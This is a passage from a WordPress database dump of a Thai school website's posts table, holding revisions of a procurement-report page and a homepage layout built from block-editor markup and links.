-->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-07-01 12:46:21','2025-07-01 05:46:21','',476,'http://pakhaeng.ssk.in.th/?p=1539',0,'revision','',0),
(1540,1,'2025-07-01 12:58:03','2025-07-01 05:58:03','<!-- wp:paragraph -->\n<p><iframe src=\"https://docs.google.com/spreadsheets/d/e/2PACX-1vTEIAytWLHtOH0qTJC7eyhlzKhUIUzcMGSMSAjrm8ppwUQn3qCGQqokmyPbupBLZw/pubhtml?widget=true&amp;headers=false\" width=\"100%\" height=\"1200\"></iframe></p>\n<!-- /wp:paragraph -->','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568','','publish','closed','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%88%e0%b9%89%e0%b8%b2-2','','','2025-07-07 14:48:17','2025-07-07 07:48:17','',0,'http://pakhaeng.ssk.in.th/?page_id=1540',0,'page','',0),
(1541,1,'2025-07-01 12:58:03','2025-07-01 05:58:03','<!-- wp:embed {\"url\":\"https://docs.google.com/spreadsheets/d/14TraOT_SawTBRG58otAkADvNomPpsvBh/edit?gid=1698444854#gid=1698444854\"} -->\n<figure class=\"wp-block-embed\"><div class=\"wp-block-embed__wrapper\">\nhttps://docs.google.com/spreadsheets/d/14TraOT_SawTBRG58otAkADvNomPpsvBh/edit?gid=1698444854#gid=1698444854\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568','','inherit','closed','closed','','1540-revision-v1','','','2025-07-01 12:58:03','2025-07-01 05:58:03','',1540,'http://pakhaeng.ssk.in.th/?p=1541',0,'revision','',0),
(1543,1,'2025-07-01 13:31:11','2025-07-01 06:31:11','','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568','','inherit','closed','closed','','1540-revision-v1','','','2025-07-01 13:31:11','2025-07-01 06:31:11','',1540,'http://pakhaeng.ssk.in.th/?p=1543',0,'revision','',0),
(1544,1,'2025-07-01 13:42:47','2025-07-01 06:42:47','','_รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุประจำปี 2568','','inherit','','closed','','_%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%88%e0%b9%89%e0%b8%b2','','','2025-07-01 13:42:47','2025-07-01 06:42:47','',1540,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุประจำปี-2568.xlsx',0,'attachment','application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',0),
(1545,1,'2025-07-01 13:43:18','2025-07-01 06:43:18','<!-- wp:file {\"id\":1544,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุประจำปี-2568.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-d9ada535-3502-4391-836d-d7e98f89700b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุประจำปี-2568.xlsx\">รายการการจัดซื้อจัดจ้างหรือจัดหาพัสดุประจำปี 2568</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุประจำปี-2568.xlsx\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d9ada535-3502-4391-836d-d7e98f89700b\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568','','inherit','closed','closed','','1540-revision-v1','','','2025-07-01 13:43:18','2025-07-01 06:43:18','',1540,'http://pakhaeng.ssk.in.th/?p=1545',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(1546,1,'2025-07-01 13:44:36','2025-07-01 06:44:36','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 